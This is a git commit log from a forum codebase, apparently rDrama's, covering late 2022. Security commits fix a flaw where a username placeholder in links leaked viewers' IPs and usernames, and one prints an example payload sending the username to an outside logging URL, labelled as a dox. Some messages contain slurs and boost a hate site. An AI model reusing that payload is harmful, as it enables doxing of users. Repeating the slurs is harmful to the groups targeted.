Snakes
fe5ffd1bcf
security: sanitize !YOU! in <a href="">.
...
Unlike the recent auto-embed exploits which have been patched, this
requires active user action. However our userbase, like all userbases,
contains quite a few retards and phoneposters who don't check links
before clicking.
Example exploit:
<a href="https://example.com/log?username=!YOU !">Bardfinn Dox</a>
2022-12-05 19:05:02 -05:00
Snakes
616634158c
Narrow approved_embed_hosts for security.
...
Probably will break some peoples' profilecss and irritate the
newsposters, but in light of recent live proven exploits to disclose
user IP & username pairs to remote servers, the broad list of embed
hosts was unsustainable and impossible to prove safe.
We extend is_safe_url to allow whitelisting subdomains, specifically
to solve the s.lain.la open redirect exploit. Also, open media proxies
like external-content.duckduckgo.com were concerning enough, despite
likely being safe, to warrant removal. Anything infrequently used and
difficult to review, or has a reasonable alternative, was also removed.
In general: we want people to be rehosting, and if we want to allow
more external content, we need to run a media proxy. The central issue
is that any user-configurable 302 is a potential disclosure risk, and
Lord knows how many ways there were to get <arbitrarynewssite>.com to
do so. Maybe zero, but the problem is we just don't know.
2022-12-05 18:57:35 -05:00
float-trip
bca9aff068
Disallow !YOU! in URLs. ( #49 )
...
!YOU! + an escape for `approved_embed_hosts` could let you grab the IP and username of everyone who views your comment
https://rdrama.net/post/129053/you-callout-thread/3191218?context=8#context
lain.la has a URL shortener that also works to get around embed hosts, fwiw
Co-authored-by: float trip <float-trip@rdrama.net>
Reviewed-on: #49
Co-authored-by: float-trip <float-trip@noreply.fsdfsd.net>
Co-committed-by: float-trip <float-trip@noreply.fsdfsd.net>
2022-12-05 21:20:59 +00:00
Aevann1
159cb52e46
add looksmax.org to BOOSTED_SITES
2022-12-05 15:59:01 +02:00
Aevann1
9dacb7c307
add teamblind.com to boosted sites
2022-12-05 08:13:11 +02:00
Aevann
18df70caab
allow JL3 to edit rules ( #39 )
...
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Reviewed-on: #39
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-05 05:22:08 +00:00
Aevann1
5473cb3084
add snus mentions
2022-12-05 04:01:55 +02:00
Aevann1
f2c4dc429a
fix for MIMW_ID
2022-12-05 04:01:01 +02:00
Aevann1
66aeb82823
add pings for MIMW
2022-12-05 03:57:24 +02:00
Aevann1
468fd5f5f4
add (((heymoon))) notifs
2022-12-05 03:40:51 +02:00
Snakes
be2b210df4
Remove superfluous #disablepoll command.
...
Already resolved by 29070c78a9
.
2022-12-04 17:15:52 -05:00
justcool393
ed0981cbdb
add functionality to disable poll formatting ( #35 )
...
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #35
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-12-04 21:46:27 +00:00
Aevann1
892e35b1c3
splash mountain for PCM
2022-12-04 23:28:39 +02:00
Aevann1
e66234eb6a
fix offsitementions
2022-12-04 21:48:28 +02:00
Aevann1
da643ea88b
sneed
2022-12-04 21:30:33 +02:00
Aevann
e105035272
remove country club system and replace it with a 3 tier thing: ( #41 )
...
- /h/masterbaiters: 1 TS - for gayops
- /h/countryclub: 1000 TS - for anything requiring secrecy and doesnt need critical mass - have to make it a rule that u cant post gayops in /h/countryclub
- /h/chudrama: 5000 TS - for chad+stud posts
EDIT: i removed the /h/masterbaiters gate, but u can bring it back if u want
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Co-authored-by: Snakes <duolsm@outlook.com>
Reviewed-on: #41
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-04 18:39:06 +00:00
Aevann1
29070c78a9
fix this and related stuff https://stupidpol.site/h/programming/post/128394/advent-of-code-day-3-i/3182179?context=8#context
2022-12-04 17:53:41 +02:00
Aevann1
30405e1841
slur fix
2022-12-04 16:44:59 +02:00
Aevann1
1f675c61e5
minor regex fix for emojis
2022-12-04 00:26:05 +02:00
Aevann1
a92737b85c
re-add kylie slur filter
2022-12-04 00:01:24 +02:00
Aevann1
8d218c28e2
fix this https://stupidpol.site/h/programming/post/128511/nostalgia-post-heres-a-shitty-tictactoe/3179456?context=8#context
2022-12-03 22:09:12 +02:00
Aevann1
0046e63bc7
boost /h/programming temporarily - revert at will
2022-12-03 21:56:27 +02:00
Aevann1
a13311d72e
sneed
2022-12-03 21:10:59 +02:00
Aevann1
a193952c5e
fix this https://stupidpol.site/h/slackernews/post/128394/advent-of-code-day-3-i/3177263?context=8#context
2022-12-03 10:02:26 +02:00
Aevann1
3907a2f25f
make the gevent sequential
2022-12-03 01:25:48 +02:00
Snakes
9b09181e28
Dispatch push notifications using greenlets.
2022-12-02 18:15:58 -05:00
Snakes
d79465517d
Rename siege log filename.
2022-12-02 17:50:48 -05:00
Aevann1
9947e635ab
make supportjews.webp an image instead
2022-12-03 00:32:51 +02:00
Aevann1
6248042e46
add supportjews emoji and use it in chud message
2022-12-03 00:22:18 +02:00
Aevann
5c2dab73c7
stop using pusher ( #37 )
...
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Co-authored-by: Snakes <duolsm@outlook.com>
Reviewed-on: #37
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-02 22:21:18 +00:00
Aevann1
3542703ced
Revert "make it so only the post author can declare winner and not all admins"
...
This reverts commit 9e1425d93e
.
2022-12-03 00:08:46 +02:00
Aevann1
9e1425d93e
make it so only the post author can declare winner and not all admins
2022-12-03 00:06:57 +02:00
Aevann1
25be392e3b
add soyjak.party to BOOSTED SITES
2022-12-03 00:02:04 +02:00
Aevann1
064b5878f9
add "media" tld
2022-12-02 12:38:07 +02:00
Aevann1
acd4a61232
add dramarama to boosted users
2022-12-01 18:22:00 +02:00
Aevann1
238c92b703
make PAGE_SIZES ordered
2022-12-01 14:28:00 +02:00
Aevann1
845e13b4ae
minor bug fix
2022-12-01 14:27:15 +02:00
Snakes
1bc086ad1b
PCM: adjust perms, add christmas banner.
2022-11-30 23:38:25 -05:00
Snakes
4585323275
Fix monthly jannie patron badge granting.
2022-11-30 23:38:25 -05:00
Snakes
885601e0ab
Fix offsitementions on localhost testing.
2022-11-30 19:24:45 -05:00
Aevann1
e1ed46fa36
rework reddit notifs - testing on pcm lol
2022-12-01 00:29:13 +02:00
Snakes
d03f3092fa
Adjust badge black/whitelists more.
2022-11-30 16:55:48 -05:00
Aevann1
87ae34966b
badge perm shit
2022-11-30 23:15:10 +02:00
Snakes
312abcbed7
offsitementions: use proper cache key in setter.
2022-11-30 15:44:01 -05:00
justcool393
34f10321fa
antispam: adjust siege threshold
2022-11-30 13:25:32 -06:00
justcool393
d55455d51c
settings: make filename an env var
2022-11-30 13:13:52 -06:00
justcool393
46f2b805ef
config: fix _SETTINGS dict and stray signups
2022-11-30 13:03:46 -06:00
justcool393
497c9bcff1
logging: don't use \n in f-string
2022-11-30 12:49:22 -06:00
justcool393
d783bc8901
logging: make logging an env var
2022-11-30 12:38:55 -06:00
justcool393
d395bcab69
logging: create somewhat sane logging
2022-11-30 12:09:31 -06:00
justcool393
0106a4e340
antispam: under siege mode
2022-11-30 11:37:35 -06:00
Aevann1
9798d2714d
add blizzard forums and bungie forums to BOOSTED_SITES
2022-11-30 13:51:01 +02:00
Aevann1
abe07e7754
this is retarded
2022-11-30 13:35:57 +02:00
justcool393
11059d1665
move calc users to context processor ( #31 )
...
jinja more like i can't think of anything witty
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #31
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-11-29 23:50:32 +00:00
Aevann1
955ec104f2
use the new /icon.webp link everywhere
2022-11-30 01:25:11 +02:00
Aevann1
b6efc27551
use "i" instead of "assets/images"
2022-11-30 00:52:19 +02:00
geese_suck
d79ad8c1f0
event asset caching
2022-11-29 14:01:25 -08:00
justcool393
5056f09380
chat: fix 500 on some... weird... state... i think?
...
cache: get out of jinja templates
chat: threshold is now a const
2022-11-29 15:49:23 -06:00
justcool393
67bfe5a5bd
remove unnecessary `str()`
2022-11-29 14:29:27 -06:00
geese_suck
a3fa96242c
holiday event manager (actually works now edition) ( #22 )
...
Co-authored-by: Snakes <duolsm@outlook.com>
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #22
Co-authored-by: geese_suck <deandre.williams@geese-suck.us>
Co-committed-by: geese_suck <deandre.williams@geese-suck.us>
2022-11-29 20:20:26 +00:00
SneedBot
a7614a5dd2
sneed
2022-11-29 14:11:34 +00:00
Aevann1
53d5f40037
sneed
2022-11-29 04:59:41 +02:00
Aevann1
60d6246a38
add "homo" to slur filter
2022-11-29 03:46:35 +02:00
Snakes
e370a52ecc
PCM: raise upload limit for patrons (by request).
2022-11-28 20:13:22 -05:00
Aevann1
3acc525e0c
truncate odds of lottery winning
2022-11-29 00:21:48 +02:00
SneedBot
c494f006f2
sneed
2022-11-28 06:05:21 +00:00
geese_suck
030710e5db
add fallback award so I dont get fucked by aevann asking me to change something for a site that has 3 active users
2022-11-27 21:24:05 -08:00
Aevann1
94f788ffe9
use exiv2 to remove metadata instead of imagemagick, much much much faster
2022-11-28 05:49:17 +02:00
Aevann1
0fd8157fa6
move CSP to nginx-level
2022-11-28 04:19:59 +02:00
Aevann1
4656fa0b8d
pin posts by pizza/impassionata/TGTW automatically for 1 hour
2022-11-28 04:07:06 +02:00
Aevann
9b50ab7219
minor fix to AGENDAPOSTER_MSG_HTML
2022-11-28 00:44:50 +02:00
Snakes
427f54175c
WPD: constantify badge whitelist, extend set.
2022-11-27 16:49:20 -05:00
justcool393
767cc467bb
marseys: cache marseys and emojis and fun stuff ( #15 )
...
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #15
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-11-27 16:59:36 +00:00
justcool393
77bdb6e87f
themes: add glitter bg category per joan request
2022-11-27 10:15:15 -06:00
Aevann1
575a5080bd
unpaywall profile views
2022-11-27 02:20:54 +02:00
justcool393
3fb647dd13
const: use dict.update instead of... what I did initially
2022-11-26 14:31:20 -06:00
justcool393
ae50cc2772
const: rename constants from LIMIT to MINIMUM
...
the new name is much much clearer
2022-11-26 14:20:44 -06:00
Marco
af74c7c1fc
Update chud award to include forced trans/pride flag hats ( #10 )
...
Disclaimer: I made these changes in Notepad and didn't bother to test this change locally.
Co-authored-by: Marco <bussylmao@gmail.com>
Reviewed-on: #10
Co-authored-by: Marco <marco@noreply.fsdfsd.net>
Co-committed-by: Marco <marco@noreply.fsdfsd.net>
2022-11-26 20:14:31 +00:00
Aevann1
bb153e541d
Revert "you posts: constantify truescore requirement"
...
This reverts commit 1b721126a2
.
2022-11-26 22:09:07 +02:00
justcool393
1b721126a2
you posts: constantify truescore requirement
2022-11-26 13:39:31 -06:00
Aevann1
86b352d301
"my brother in christ" becomes "my brother in Allah"
2022-11-26 07:06:52 +02:00
Aevann1
a641acaf8f
use sets instead of lists in some statements
2022-11-26 06:52:47 +02:00
justcool393
46204ea223
ranking: be site specific when boosting users or excluding users from boosts
...
otherwise we may unintentionally rank for the wrong users (since we're using literal IDs)
2022-11-25 20:04:09 -06:00
Aevann1
6a94ac3aa9
since lawlz got demopped, make his automatic mod actions be executed by autojanny instead
2022-11-26 03:56:04 +02:00
Aevann1
e96274308a
sneed
2022-11-26 03:31:17 +02:00
Aevann1
0f984b121a
add "negroid" to slur filter
2022-11-26 03:19:22 +02:00
justcool393
35b1532bb4
admin: remove meme admin vestige
2022-11-25 19:15:39 -06:00
Aevann1
0bd96112d1
add joan to BOOSTED_USERS
2022-11-26 01:49:21 +02:00
Aevann1
88ed437c9b
add quad to BOOSTED_USERS
2022-11-26 01:43:23 +02:00
Aevann1
68060ee56e
add dailystormer.in to BOOSTED_SITES
2022-11-26 01:39:37 +02:00
Aevann1
bf4031c832
remove annoying excalmation sign in notifs
2022-11-26 01:18:24 +02:00
justcool393
7e403469cd
polls: constantify max poll options
2022-11-25 16:12:25 -06:00
justcool393
f86d351ac4
fix saved subscribers stuff
2022-11-25 16:06:18 -06:00
Aevann1
c5446b3a39
do this https://rdrama.life/post/125878/colorado-shooter-proves-his-idpol-credentials/3129042?context=8#context
2022-11-25 23:01:35 +02:00
Aevann1
3dee4afa6f
make "snekchad" ping sneks
2022-11-25 21:36:37 +02:00
Aevann1
f672037021
remove lmbo profanity filter
2022-11-25 21:36:09 +02:00
Snakes
0254ff6567
Restrict New User hat to rDrama.
2022-11-23 20:28:39 -05:00
AverageBen10Enjoyer
c37c8be209
Removing references to old repo
2022-11-23 21:19:39 +00:00
justcool393
042edf15bd
make antispam a bit less :marseyshook:
2022-11-23 14:45:09 -06:00
Snakes
654da03435
De-Githubify repo.
...
- Remove Github-specific tooling.
- Add fsdfsd.net to approved embed hosts.
- Switch link in navigation menu.
2022-11-23 12:24:13 -05:00